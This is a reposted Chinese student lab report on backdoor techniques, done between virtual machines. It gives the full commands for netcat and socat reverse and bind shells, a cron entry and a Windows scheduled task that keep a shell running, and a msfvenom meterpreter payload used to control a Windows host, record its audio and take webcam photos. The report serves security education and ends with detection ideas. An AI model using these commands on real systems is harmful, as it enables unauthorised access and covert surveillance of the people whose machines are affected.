20154324 刘康权 《网络对抗》Exp2 后门原理与实践

2023-10-15 11:50

本文主要是介绍20154324 刘康权 《网络对抗》Exp2 后门原理与实践,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、实践目标与内容

1.学习内容

  • 使用nc实现win,mac,Linux间的后门连接
  • meterpreter的应用
  • MSF POST 模块的应用

2.学习目标

  • 学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的安全意识 。

3.概念

  • 后门就是不经过正常认证流程而访问系统的通道。
  • netcat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
  • socat是ncat的增强版,它使用的格式是socat [options]
  • 其中两个address是必选项,而options 是可选项。socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

二、实践步骤:常用的后门工具的应用

1.Windows获得Linux Shell

1.1查看win7和linux的ip地址

1344859-20180328172857013-1535439148.png
1344859-20180328172901683-632168490.png

1.2windows打开监听

ncat.exe -l -p 4324

1.3Linux反弹连接windows

nc 192.168.211.129 4324 -e /bin/sh

1.4windows下获得linux shell,运行指令

1344859-20180328174253868-339643878.png

2.Linux获得Windows Shell

2.1Linux打开监听

nc -l -p 4324

2.2Windows反弹连接Linux

ncat.exe -e cmd.exe 192.168.211.130 4324

2.3Linux下看到Windows的命令提示

1344859-20180328174522394-1826253073.png

3.使用nc传输数据

3.1Windows下监听4324端口

ncat.exe -l -p 4324

3.2Linux下连接到Windows的4324端口

nc 192.168.211.129 4324

3.3建立连接成功之后,进行字符串的传输

1344859-20180328175103399-518722171.png
1344859-20180328175111423-1015216105.png

4.使用netcat获取主机操作Shell,cron启动

4.1先在Windows系统下,监听4324端口

ncat.exe -l -p 4324

4.2在Linux环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。

1344859-20180328175739337-2120161976.png

4.3用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器
4.4在最后一行添加44 * * * * /bin/netcat 192.168.211.129 4312 -e /bin/sh,意思是在每个小时的第44分钟反向连接Windows主机的4324端口,因为当时的时间是17:53,所以设置成44,这样,过一分钟就能看到效果了

1344859-20180328202749072-749246493.png

4.5在17:54的时候,获得了Linux的shell

1344859-20180328202900261-398957951.png

5.使用socat获取主机操作Shell, 任务计划启动

5.1在Windows系统下,打开控制面板,搜索计划任务,进去后就可以开始创建任务,填写任务名称后,新建一个触发器。

1344859-20180328203430428-493010361.png

5.2在操作->程序或脚本中选择socat.exe文件的路径,并在添加参数一栏填写tcp-listen:4324 exec:cmd.exe,pty,stderr,这个命令是为了把cmd.exe绑定到端口4324,同时把cmd.exe的stderr重定向到stdout上

1344859-20180328203626403-1134498598.png

注意:参数之间用空格或者 :隔开!

5.3创建之后,右键任务直接运行
5.4 在Linux环境下输入指令,这里的第一个参数代表标准的输入输出,第二个流连接到Windows主机的4324端口,此时可以发现已经成功获得了一个cmd shell

socat - tcp:192.168.211.129:4324
1344859-20180328204041884-960196404.png

6.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

6.1在Linux环境下生成后门程序20154324_backdoor.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.211.130 LPORT=4324 -f exe > 20154324_backdoor.exe
1344859-20180328204313065-92622414.png

6.2通过nc指令将生成的后门程序传送到Windows主机上,Linux的nc指令在上图
  • nc 192.168.211.129 4324 < 20154324_backdoor.exe
  • ncat.exe -l 4324 > 20154324_backdoor.exe
    1344859-20180328204605541-456791993.png
6.3在Linux上使用msfconsole指令进入msf控制台,使用监听模块,并设置payload以及反弹回连的IP和端口:

1344859-20180328204717773-523520818.png
1344859-20180328204725761-313451169.png

6.4在设置完成后,在Linux环境执行监听

1344859-20180328204829334-918967867.png

6.5在Windows环境打开后门程序20154324_backdoor.exe,此时可以看到在Linux环境下已经获得了Windows主机的连接,并且得到了远程控制的shell

1344859-20180328205134707-2024677751.png

7.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

7.1在前一次实践中已经获取主机Shell的前提下,进行录音并保存

1344859-20180328205340477-1379671566.png

7.2获取摄像头权限进行照相并保存

1344859-20180328205436072-2047071933.png

三、问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?

  • 通过这次实践,我意识到有许多方式可以设置后门进入我的系统,我觉得最有可能存在后门的就是非官方下载的软件,这里面很有可能存在后门,使得其他人可以进入我的系统,还有就是可以在许多可执行文件中设置后门。

2.例举你知道的后门如何启动起来(win及linux)的方式?

  • 我认为当设置后门的可执行软件执行到启动后门的特定步骤时,后门就会启动。或者伪装成一种服务,当用户启用服务时,就会启动后门。在Linux下,通过cron设置定时任务,到了特定时间就会有获得一个shell。而在windows下,通过设置任务计划,设置相应条件,满足条件就会实现启动后门,

3.Meterpreter有哪些给你映像深刻的功能?

  • 它的msfvenom指令可以编写可执行的后门程序,甚至可以设置反弹回连的IP、回连的端口和文件的类型,在通过nc传输后可以实现后门的功能。还有就是它的help语句,可以查看各种命令以及相应的用途。最让我震惊的就是还能进行录音、摄像,以后我一定要把摄像头盖住了。

4.如何发现自己有系统有没有被安装后门?

  • 我想到的第一个办法就是用杀毒软件,哈哈,但通过这次实践,我认为我们还可以通过扫描端口,查看端口是否存在绑定后门程序等问题。

四、心得体会

在这次实践中,我们学习了后门的基本原理及它的运行过程,但最重要的还是实现了简单的后门连接,而在这次实践中,我们运用的应用程序中的后门,或者可以说伪装为特定应用的专用后门程序,我感觉我的电脑中很有可能就存在后门程序。同时我也见识到了后门的厉害,可以实现许多功能,甚至还能实现一些我自己都没用过的功能。一定要认真学习好网络对抗,至少要保护好自己的系统。

五、存在的问题

1.两个虚拟机无法实现连接

  • 解决方法:改变虚拟机的网络连接方式为NAT模式,并进行相应的设置。

2.无法实现虚拟机的摄像功能

  • 解决方法:在VMware中,点击虚拟机中的可移动设备进行连接,启动虚拟机的摄像功能。

转载于:https://www.cnblogs.com/liukangquan/p/8666581.html

这篇关于20154324 刘康权 《网络对抗》Exp2 后门原理与实践的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/217515

相关文章

SpringBoot项目中Maven剔除无用Jar引用的最佳实践

《SpringBoot项目中Maven剔除无用Jar引用的最佳实践》在SpringBoot项目开发中,Maven是最常用的构建工具之一,通过Maven,我们可以轻松地管理项目所需的依赖,而,... 目录1、引言2、Maven 依赖管理的基础概念2.1 什么是 Maven 依赖2.2 Maven 的依赖传递机

Oracle查询优化之高效实现仅查询前10条记录的方法与实践

《Oracle查询优化之高效实现仅查询前10条记录的方法与实践》:本文主要介绍Oracle查询优化之高效实现仅查询前10条记录的相关资料,包括使用ROWNUM、ROW_NUMBER()函数、FET... 目录1. 使用 ROWNUM 查询2. 使用 ROW_NUMBER() 函数3. 使用 FETCH FI

在C#中获取端口号与系统信息的高效实践

《在C#中获取端口号与系统信息的高效实践》在现代软件开发中,尤其是系统管理、运维、监控和性能优化等场景中,了解计算机硬件和网络的状态至关重要,C#作为一种广泛应用的编程语言,提供了丰富的API来帮助开... 目录引言1. 获取端口号信息1.1 获取活动的 TCP 和 UDP 连接说明:应用场景:2. 获取硬

Java内存泄漏问题的排查、优化与最佳实践

《Java内存泄漏问题的排查、优化与最佳实践》在Java开发中,内存泄漏是一个常见且令人头疼的问题,内存泄漏指的是程序在运行过程中,已经不再使用的对象没有被及时释放,从而导致内存占用不断增加,最终... 目录引言1. 什么是内存泄漏?常见的内存泄漏情况2. 如何排查 Java 中的内存泄漏?2.1 使用 J

Redis主从/哨兵机制原理分析

《Redis主从/哨兵机制原理分析》本文介绍了Redis的主从复制和哨兵机制,主从复制实现了数据的热备份和负载均衡,而哨兵机制可以监控Redis集群,实现自动故障转移,哨兵机制通过监控、下线、选举和故... 目录一、主从复制1.1 什么是主从复制1.2 主从复制的作用1.3 主从复制原理1.3.1 全量复制

Redis主从复制的原理分析

《Redis主从复制的原理分析》Redis主从复制通过将数据镜像到多个从节点,实现高可用性和扩展性,主从复制包括初次全量同步和增量同步两个阶段,为优化复制性能,可以采用AOF持久化、调整复制超时时间、... 目录Redis主从复制的原理主从复制概述配置主从复制数据同步过程复制一致性与延迟故障转移机制监控与维

SSID究竟是什么? WiFi网络名称及工作方式解析

《SSID究竟是什么?WiFi网络名称及工作方式解析》SID可以看作是无线网络的名称,类似于有线网络中的网络名称或者路由器的名称,在无线网络中,设备通过SSID来识别和连接到特定的无线网络... 当提到 Wi-Fi 网络时,就避不开「SSID」这个术语。简单来说,SSID 就是 Wi-Fi 网络的名称。比如

SpringCloud配置动态更新原理解析

《SpringCloud配置动态更新原理解析》在微服务架构的浩瀚星海中,服务配置的动态更新如同魔法一般,能够让应用在不重启的情况下,实时响应配置的变更,SpringCloud作为微服务架构中的佼佼者,... 目录一、SpringBoot、Cloud配置的读取二、SpringCloud配置动态刷新三、更新@R

Linux中Curl参数详解实践应用

《Linux中Curl参数详解实践应用》在现代网络开发和运维工作中,curl命令是一个不可或缺的工具,它是一个利用URL语法在命令行下工作的文件传输工具,支持多种协议,如HTTP、HTTPS、FTP等... 目录引言一、基础请求参数1. -X 或 --request2. -d 或 --data3. -H 或

Java实现任务管理器性能网络监控数据的方法详解

《Java实现任务管理器性能网络监控数据的方法详解》在现代操作系统中,任务管理器是一个非常重要的工具,用于监控和管理计算机的运行状态,包括CPU使用率、内存占用等,对于开发者和系统管理员来说,了解这些... 目录引言一、背景知识二、准备工作1. Maven依赖2. Gradle依赖三、代码实现四、代码详解五